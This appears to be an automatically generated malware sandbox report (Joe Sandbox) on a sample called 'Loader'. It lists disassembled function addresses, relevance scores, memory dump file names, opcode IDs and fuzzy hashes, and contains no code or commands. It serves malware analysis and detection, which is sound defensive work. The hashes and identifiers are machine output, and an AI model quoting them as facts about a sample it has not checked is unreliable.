                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 99e9778949781af12bf9a95df23b90ad39d320b61aec5c3dcafe0a0628d51894
                                                                                        • Instruction ID: 3ebb04d120b9a7b4f1ad73d687debb6db223a5719ecffe96ce511131f4aded75
                                                                                        • Opcode Fuzzy Hash: 99e9778949781af12bf9a95df23b90ad39d320b61aec5c3dcafe0a0628d51894
                                                                                        • Instruction Fuzzy Hash: 2AE136726183115BC324DF24C98162BF7E2EBC8314F2A952EF9C867351DB35AC058BD6
                                                                                        Function 0041912E Relevance: .5, Instructions: 529COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
                                                                                        • Instruction ID: 7aed7d034054570e623b21814fe3e88dbdb9baf50802d39517b861f70b912fd3
                                                                                        • Opcode Fuzzy Hash: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
                                                                                        • Instruction Fuzzy Hash: 29E104719583228BC7208F25C4A06ABF7F1FF95754F198A1EE8C51B360E3789C81C79A
                                                                                        Function 004144D5 Relevance: .5, Instructions: 475COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c9f0d9908fca68e680a27640601c6fc364c47c9d5e019e547a9c2df220fcedf6
                                                                                        • Instruction ID: 3f4607f348259b91e3f3bb69225e26a46c3ad6fe886f003ab5616493c8c42938
                                                                                        • Opcode Fuzzy Hash: c9f0d9908fca68e680a27640601c6fc364c47c9d5e019e547a9c2df220fcedf6
                                                                                        • Instruction Fuzzy Hash: 80D123B9618200DFE7059F24E842BBBB3A1EB8B714F14582DE5C563291D739EC52CB4A
                                                                                        Function 00405950 Relevance: .4, Instructions: 449COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
                                                                                        • Instruction ID: af7042075d954c2f255990e0047815087897ea865b94a08f0ee2ad65f5f0e8bc
                                                                                        • Opcode Fuzzy Hash: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
                                                                                        • Instruction Fuzzy Hash: 05F1E3356087418FD724CF29C88162BFBE6EFD9304F08882EE4D587791E679E904CB96
                                                                                        Function 004223A0 Relevance: .4, Instructions: 383COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
                                                                                        • Instruction ID: b5892ab382dddcfdfd1d94d0be47f02d5ea24576abd0edcd507820bf7b56d976
                                                                                        • Opcode Fuzzy Hash: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
                                                                                        • Instruction Fuzzy Hash: 78B11A72A08321ABD714DF24D891767B3E1FFC4318F14852DE9899B381E7B8E905C79A
                                                                                        Function 00416603 Relevance: .3, Instructions: 334COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: df32d1972c32d51d3bbb904f330329fbb66df0727e18fd7e0eba91c41eb92635
                                                                                        • Instruction ID: 6e94b3fcf232f5d03b146c20a53fd0e815a3357b0506236d01a4d6b9f375cd80
                                                                                        • Opcode Fuzzy Hash: df32d1972c32d51d3bbb904f330329fbb66df0727e18fd7e0eba91c41eb92635
                                                                                        • Instruction Fuzzy Hash: 9F7104366452118BD728DF14C8927BBB393FBC9318F1A553E88D957296C738DC42CB89
                                                                                        Function 0041DE20 Relevance: .3, Instructions: 314COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
                                                                                        • Instruction ID: fafd2c305fa30de8266e08fde3152fb23d27fc24ba4380c9d819510652bcf668
                                                                                        • Opcode Fuzzy Hash: f3adbf9656ac4d5bb57d7c42e32c36d92f3f14e42cee5d00cb49a14ab61a527a
                                                                                        • Instruction Fuzzy Hash: 80B12075A04301BFD7118F24EC41B6BBBE1BFD9314F108A2EF898A32A0D7759D549B4A
                                                                                        Function 00406240 Relevance: .3, Instructions: 303COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                        • Instruction ID: b0da67189007bcc97d6055f8bbbbefa6b2a6acbc0e85e8bb44e11b41e7f0aee1
                                                                                        • Opcode Fuzzy Hash: ff3d6e211bd95c70ee6cf6190c68f33be0baa356b58271dd76cc8d8e8cc5752b
                                                                                        • Instruction Fuzzy Hash: 50C15DB29087418FC360CF68DC96BABB7E1BF85318F09492DD1DAD6342D778A155CB0A
                                                                                        Function 0043EF60 Relevance: .3, Instructions: 296COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4e89514d7dac5dfbace0a3c2120b488323016d79f8a5a6a28643cbff8d0ca643
                                                                                        • Instruction ID: df5d66982e82d9da0c83d8871eb17dc63a9cae4063427cc854b8ed9741255339
                                                                                        • Opcode Fuzzy Hash: 4e89514d7dac5dfbace0a3c2120b488323016d79f8a5a6a28643cbff8d0ca643
                                                                                        • Instruction Fuzzy Hash: B191D035A042029BD714DF18D890A2BB3E2FFD9710F1A947DE8848B365DB35EC15CB86
                                                                                        Function 004162F1 Relevance: .3, Instructions: 278COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 511e5f5d07354a950006b57d08dd2b492a5e40f6cefdfcbce624f94dcd51246f
                                                                                        • Instruction ID: b19f5d29e2c271d05d9b02af8e112a34cc993ab04f81e0962c2f1fd7e648b238
                                                                                        • Opcode Fuzzy Hash: 511e5f5d07354a950006b57d08dd2b492a5e40f6cefdfcbce624f94dcd51246f
                                                                                        • Instruction Fuzzy Hash: 577126376442115BD7289B14C8D27BBB393EBC4308F2B943EC89597346C639DC42CB99
                                                                                        Function 0041C661 Relevance: .3, Instructions: 269COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                        • Instruction ID: 837a5f8fba9af2e76d8f4c8dd82aa53554112591729eea7ba58ef9321cfe3655
                                                                                        • Opcode Fuzzy Hash: 4a7e2e401e033a0f057dbf8ff00cebb85c56be680a596657b403d1290487c1e4
                                                                                        • Instruction Fuzzy Hash: CC612775A443418BD714CF28C8D12B7B7E1EFD6314F18591DE8D69B390E3399841CB99
                                                                                        Function 0043ADE0 Relevance: .2, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bdc149f6aa6c65f2afe0ce58afa7e2e12997a48fd04755b1e3ff8753db4aaf0f
                                                                                        • Instruction ID: b35cb8c2cf53a133ed11b1d86afdaa14cbe7a2f38a3c964bfbd89494e95443a3
                                                                                        • Opcode Fuzzy Hash: bdc149f6aa6c65f2afe0ce58afa7e2e12997a48fd04755b1e3ff8753db4aaf0f
                                                                                        • Instruction Fuzzy Hash: 49513876A947208FC710DF28888066BF7A2EB99328F5A596ED9D4A7310D339DC11C7C7
                                                                                        Function 0041910E Relevance: .2, Instructions: 235COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57cbe29f3acfbb96a0407096e691a252ccdd5f49df0adfd4ec822cf8a0979c5f
                                                                                        • Instruction ID: cecfcecca609f4f8aefbd91ebdf5ed5dce85e47701b726ac3bc9c92813edaa51
                                                                                        • Opcode Fuzzy Hash: 57cbe29f3acfbb96a0407096e691a252ccdd5f49df0adfd4ec822cf8a0979c5f
                                                                                        • Instruction Fuzzy Hash: A68118F5A083515FC718CF18C0916ABB7E2ABE5304F14892EE4DA87342D639DD8ACB56
                                                                                        Function 004383A0 Relevance: .2, Instructions: 218COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce77249f7da53d6eb946ab68e7e4d6b580af9a2ed7836514d26728ed629edcae
                                                                                        • Instruction ID: f6c45a8c634b512175a9e70196cb5cb6fdc393861da751afe9f50228713363b5
                                                                                        • Opcode Fuzzy Hash: ce77249f7da53d6eb946ab68e7e4d6b580af9a2ed7836514d26728ed629edcae
                                                                                        • Instruction Fuzzy Hash: C75154B2219301ABD714DF24D881B3FB3E5EB88304F15582DF5C597281EB39E815CB9A
                                                                                        Function 0041E220 Relevance: .2, Instructions: 217COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                        • Instruction ID: 71661ae89f4dd01ff183d23213b8ff6c182fb73d3ee196f738fd9547aa9552c9
                                                                                        • Opcode Fuzzy Hash: ea139d436da9a42b5af944e7643efc36d26f377cf16c3da6660ca1ea28a71a55
                                                                                        • Instruction Fuzzy Hash: C361E73A649A9047E329CA3E4C613EA6E930FD7230F2DC76AEDF5873E1C56948468345
                                                                                        Function 004199E2 Relevance: .2, Instructions: 215COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d83bca14b4ce495ba67310cee811436dda4ca7262d4045f186dce4ff59411968
                                                                                        • Instruction ID: 103638228cde8f0ddd279f3242b3a0c66f1c78d5dd6d37fd669a412139e610f8
                                                                                        • Opcode Fuzzy Hash: d83bca14b4ce495ba67310cee811436dda4ca7262d4045f186dce4ff59411968
                                                                                        • Instruction Fuzzy Hash: 09610677A2935087D339CF14C8A13EBB6D2BBCA314F1A463DC4DA57291CB395902CB86
                                                                                        Function 00432370 Relevance: .2, Instructions: 203COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
                                                                                        • Instruction ID: 59add0b6ac401b792bf6ca932ddb3aab880f712b326be28d571c8b7eb3c2cde8
                                                                                        • Opcode Fuzzy Hash: 3ee60825706bd1979d5f6783ae8aacf4056d3ecd9403fe59bacac0383620a459
                                                                                        • Instruction Fuzzy Hash: 96512836A5A9904BE3288A3D4D2136679834FEB330F3DD77AA5B1873F5C5BD88024359
                                                                                        Function 00423699 Relevance: .2, Instructions: 201COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 09949bd114e3357849821c2342b6d8f9fdc9bcc2aff312f62db3595347d323c5
                                                                                        • Instruction ID: 3674ee1043ff53bbacdcda023bd703922f0cd6b64f6926a4024f69ceb265895f
                                                                                        • Opcode Fuzzy Hash: 09949bd114e3357849821c2342b6d8f9fdc9bcc2aff312f62db3595347d323c5
                                                                                        • Instruction Fuzzy Hash: 7461E039A08202CFE318CF69E89132AB3E2FFC9311F59857CE98587291D778D951CB44
                                                                                        Function 0041B650 Relevance: .2, Instructions: 200COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                        • Instruction ID: b4bd1d43185d4267fc95ac4d79e73dc03833d4744d2df80aa086061bc0fab29c
                                                                                        • Opcode Fuzzy Hash: b788d366b37990fd8b512b9f352556e76483e0de2e58c15ff86fdb87e33e91f9
                                                                                        • Instruction Fuzzy Hash: 2B510636B159D04BC7149A7C4C413EAAA535BE733473D836BE8B4C73E5D62A8C4243D5
                                                                                        Function 0041E560 Relevance: .2, Instructions: 192COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                        • Instruction ID: 1dbfe680f79b7bc42e4c2a034f6e37913707943d44f4a0eb3da3a59864a671cb
                                                                                        • Opcode Fuzzy Hash: cf0dfac4f95839a39133e74d75d87f013ce75ab19d687191ed322443166bf8d9
                                                                                        • Instruction Fuzzy Hash: 43514C3B6499D14BE7288A3D5C113E66A834BE3334F3DC77BD9B1873E1D96948824349
                                                                                        Function 00436F20 Relevance: .2, Instructions: 189COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9bdbf699b7803bb421f447e227b31dbd0a4a1b53ba0c1baea900085ed5ea74d5
                                                                                        • Instruction ID: c8d49a6ff177a597ceac419c0c9b69cbf9ac8c960e381b5f21487d05f4e0f372
                                                                                        • Opcode Fuzzy Hash: 9bdbf699b7803bb421f447e227b31dbd0a4a1b53ba0c1baea900085ed5ea74d5
                                                                                        • Instruction Fuzzy Hash: 7C515DB15087548FE314DF29D49475BBBE1BBC8318F044A2EE5E987391E379DA088F86
                                                                                        Function 00423A1C Relevance: .2, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
